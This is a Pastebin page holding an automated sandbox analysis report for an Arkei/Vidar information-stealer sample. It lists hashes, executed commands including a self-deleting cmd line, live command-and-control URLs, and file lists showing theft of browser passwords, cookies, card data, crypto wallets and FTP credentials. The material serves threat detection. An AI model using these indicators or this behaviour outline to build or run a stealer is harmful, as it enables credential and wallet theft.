Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * ID: 1234
- * MalFamily: "Arkei"
- * MalScore: 10.0
- * File Name: "Exes_21f7a26bb9e91117169edfd7d3967cfb.exe"
- * File Size: 1338368
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "7716c84415ccd122f0ad35d15a26b63f09956202c4bb1004e31a5952c771df83"
- * MD5: "21f7a26bb9e91117169edfd7d3967cfb"
- * SHA1: "89448a5b10e160ccfe85138944a2ff3f988d51b8"
- * SHA512: "8e92478041ec3a504b7b59158bfcd6b7bacb21c1c8990be379e0a4099c8a38764ee7a42ccf74b3fff3b57f8464eab2793cbceab516317c5b34164d6f10f59221"
- * CRC32: "83995902"
- * SSDEEP: "24576:0FooK+7+Qu5HwaFQWC+2tiuxkmPzqPJ9EPZadN1vL9wC7AU6nxpbdK:CKYl0HwaCWC+2AatPzqPJ4QXHc7"
- * Process Execution:
- "9z25yPQnjM.exe",
- "9z25yPQnjM.exe",
- "cmd.exe",
- "taskkill.exe",
- "services.exe",
- "lsass.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "svchost.exe",
- "taskeng.exe",
- "taskeng.exe",
- "msoia.exe",
- "msoia.exe",
- "taskeng.exe",
- "WMIADAP.exe"
- * Executed Commands:
- "C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe",
- "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit",
- "C:\\Windows\\System32\\cmd.exe /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit",
- "C:\\Windows\\system32\\lsass.exe",
- "taskkill /im 9z25yPQnjM.exe /f",
- "taskeng.exe 211F1106-53AB-4021-868B-2F49FACAB8E4 S-1-5-18:NT AUTHORITY\\System:Service:",
- "taskeng.exe D7A509EA-AB99-4E2A-B99E-04EE4FF35A33 S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
- "taskeng.exe 6E5C69F1-55AA-4A7A-B970-656893D7C708 S-1-5-18:NT AUTHORITY\\System:Service:",
- "\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE wmiadap.exe /F /T /R",
- "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\"",
- "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload mininterval:2880",
- "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload"
- * Signatures Detected:
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "Behavioural detection: Executable code extraction",
- "Details":
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Anomalous file deletion behavior detected (10+)",
- "Details":
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\426A.tmp"
- "DeletedFile": "C:\\ProgramData\\freebl3.dll"
- "DeletedFile": "C:\\ProgramData\\mozglue.dll"
- "DeletedFile": "C:\\ProgramData\\msvcp140.dll"
- "DeletedFile": "C:\\ProgramData\\nss3.dll"
- "DeletedFile": "C:\\ProgramData\\softokn3.dll"
- "DeletedFile": "C:\\ProgramData\\vcruntime140.dll"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Edge_Cookies.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\IE_Cookies.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\cookie_list.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\information.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\passwords.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\screenshot.jpg"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft\\Authy"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DashCore"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectronCash"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectrumLTC"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Ethereum"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Exodus"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\GoldCoinGLD"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IOCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\JAXX"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MultiDoge"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Zcash"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\US_00000000-0000-0000-0000-0000000000009253538962.zip"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe"
- "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
- "Description": "Guard pages use detected - possible anti-debugging.",
- "Details":
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "taskeng.exe tried to sleep 421 seconds, actually delayed analysis time by 0 seconds"
- "Process": "WmiPrvSE.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Performs HTTP requests potentially not found in PCAP.",
- "Details":
- "url_ioc": "dersed.com:80//288"
- "url_ioc": "dersed.com:80//freebl3.dll"
- "url_ioc": "dersed.com:80//mozglue.dll"
- "url_ioc": "dersed.com:80//msvcp140.dll"
- "url_ioc": "dersed.com:80//nss3.dll"
- "url_ioc": "dersed.com:80//softokn3.dll"
- "url_ioc": "dersed.com:80//vcruntime140.dll"
- "url_ioc": "ip-api.com:80//line/"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "9z25yPQnjM.exe -> C:\\Windows\\System32\\cmd.exe"
- "Process": "svchost.exe -> \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- "suspicious_request_iocs": "http://dersed.com/288"
- "suspicious_request_iocs": "http://dersed.com/freebl3.dll"
- "suspicious_request_iocs": "http://dersed.com/mozglue.dll"
- "suspicious_request_iocs": "http://dersed.com/msvcp140.dll"
- "suspicious_request_iocs": "http://dersed.com/nss3.dll"
- "suspicious_request_iocs": "http://dersed.com/softokn3.dll"
- "suspicious_request_iocs": "http://dersed.com/vcruntime140.dll"
- "suspicious_request_iocs": "http://ip-api.com/line/"
- "suspicious_request_iocs": "http://dersed.com/"
- "Description": "Performs some HTTP requests",
- "Details":
- "url_iocs": "http://dersed.com/288"
- "url_iocs": "http://dersed.com/freebl3.dll"
- "url_iocs": "http://dersed.com/mozglue.dll"
- "url_iocs": "http://dersed.com/msvcp140.dll"
- "url_iocs": "http://dersed.com/nss3.dll"
- "url_iocs": "http://dersed.com/softokn3.dll"
- "url_iocs": "http://dersed.com/vcruntime140.dll"
- "url_iocs": "http://ip-api.com/line/"
- "url_iocs": "http://dersed.com/"
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details":
- "section": "name: .rsrc, entropy: 7.94, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x000dd400, virtual_size: 0x000dd3c8"
- "Description": "Uses Windows utilities for basic functionality",
- "Details":
- "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit"
- "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit"
- "command": "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
- "Description": "Behavioural detection: Injection (Process Hollowing)",
- "Details":
- "Injection": "9z25yPQnjM.exe(3892) -> 9z25yPQnjM.exe(1328)"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "9z25yPQnjM.exe(3892) -> 9z25yPQnjM.exe(1328)"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Behavioural detection: Injection (inter-process)",
- "Details":
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Google Chrome_Default.txt"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Edge_Cookies.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\IE_Cookies.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
- "Description": "Collects information about installed applications",
- "Details":
- "Program": "Google Update Helper"
- "Program": "Microsoft Excel MUI 2013"
- "Program": "Microsoft Outlook MUI 2013"
- "Program": "Google Chrome"
- "Program": "Adobe Flash Player 29 NPAPI"
- "Program": "Adobe Flash Player 29 ActiveX"
- "Program": "Microsoft DCF MUI 2013"
- "Program": "Microsoft Access MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - English"
- "Program": "Adobe Acrobat Reader DC"
- "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
- "Program": "Microsoft Publisher MUI 2013"
- "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
- "Program": "Microsoft Office Shared MUI 2013"
- "Program": "Microsoft Office OSM MUI 2013"
- "Program": "Microsoft InfoPath MUI 2013"
- "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
- "Program": "Microsoft Word MUI 2013"
- "Program": "Microsoft Groove MUI 2013"
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- "Program": "Microsoft Office OSM UX MUI 2013"
- "Program": "Java Auto Updater"
- "Program": "Microsoft PowerPoint MUI 2013"
- "Program": "Microsoft Office Professional Plus 2013"
- "Program": "Adobe Refresh Manager"
- "Program": "Microsoft Office Proofing 2013"
- "Program": "Microsoft OneNote MUI 2013"
- "Description": "File has been identified by 37 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "Trojan.GenericKD.32391018"
- "McAfee": "Artemis!21F7A26BB9E9"
- "CrowdStrike": "win/malicious_confidence_100% (W)"
- "BitDefender": "Trojan.GenericKD.32391018"
- "K7GW": "Riskware ( 0040eff71 )"
- "K7AntiVirus": "Riskware ( 0040eff71 )"
- "TrendMicro": "Mal_HPGen-37b"
- "Symantec": "ML.Attribute.HighConfidence"
- "ESET-NOD32": "a variant of Win32/GenKryptik.DSFF"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "GData": "Win32.Trojan-Stealer.Vidar.HFQMXD"
- "Kaspersky": "Trojan.Win32.Chapak.dywh"
- "Avast": "FileRepMetagen Malware"
- "Endgame": "malicious (high confidence)"
- "Sophos": "Mal/Generic-S"
- "F-Secure": "Trojan.TR/Chapak.pfzxh"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.Generic.tc"
- "Trapmine": "suspicious.low.ml.score"
- "FireEye": "Generic.mg.21f7a26bb9e91117"
- "Emsisoft": "Trojan.GenericKD.32391018 (B)"
- "Avira": "TR/Chapak.pfzxh"
- "Microsoft": "Trojan:Win32/Tiggre!plock"
- "Arcabit": "Trojan.Generic.D1EE3F6A"
- "AegisLab": "Trojan.Win32.Chapak.4!c"
- "ZoneAlarm": "Trojan.Win32.Chapak.dywh"
- "Acronis": "suspicious"
- "VBA32": "BScope.TrojanPSW.Zbot"
- "Ad-Aware": "Trojan.GenericKD.32391018"
- "Malwarebytes": "Spyware.PredatorTheThief"
- "TrendMicro-HouseCall": "Mal_HPGen-37b"
- "Rising": "Trojan.Generic@ML.89 (RDML:DwZEfvt+IvzJSolmz/PxXA)"
- "Ikarus": "Trojan.Crypt"
- "Fortinet": "W32/Kryptik.GVSM!tr"
- "AVG": "FileRepMetagen Malware"
- "Qihoo-360": "Win32/Trojan.abe"
- "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
- "Details":
- "Description": "Attempts to access Bitcoin/ALTCoin wallets",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin\\\\x12"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\\\x12"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\\n"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum\\\n"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin\\*.*"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\\n"
- "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin\\*.*"
- "Description": "Harvests credentials from local FTP client softwares",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
- "Description": "Harvests information related to installed instant messenger clients",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
- "Description": "Uses suspicious command line tools or Windows utilities",
- "Details":
- "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit"
- "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit"
- "command": "taskkill /im 9z25yPQnjM.exe /f"
- * Started Service:
- "VaultSvc"
- * Mutexes:
- "Local\\_!MSFTHISTORY!_",
- "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
- "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
- "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!",
- "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963",
- "Global\\ADAP_WMI_ENTRY",
- "Global\\RefreshRA_Mutex",
- "Global\\RefreshRA_Mutex_Lib",
- "Global\\RefreshRA_Mutex_Flag"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\GDIPFONTCACHEV1.DAT",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\passwords.txt",
- "C:\\ProgramData\\freebl3.dll",
- "C:\\ProgramData\\mozglue.dll",
- "C:\\ProgramData\\msvcp140.dll",
- "C:\\ProgramData\\nss3.dll",
- "C:\\ProgramData\\softokn3.dll",
- "C:\\ProgramData\\vcruntime140.dll",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\ld",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\historych",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\c",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\wd",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft\\Authy\\\\xef\\x94\\x98\\xcd\\xb4\\xef\\x93\\x94\\x18\\xe3\\xa2\\x9e\\xe7\\x9c\\x86\\xc4\\xb8\\xc8\\x82",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\IE_Cookies.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Edge_Cookies.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\cookie_list.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\information.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin\\\\x12",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Ethereum\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum\\\n",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectrumLTC\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Exodus\\\n",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Exodus\\",
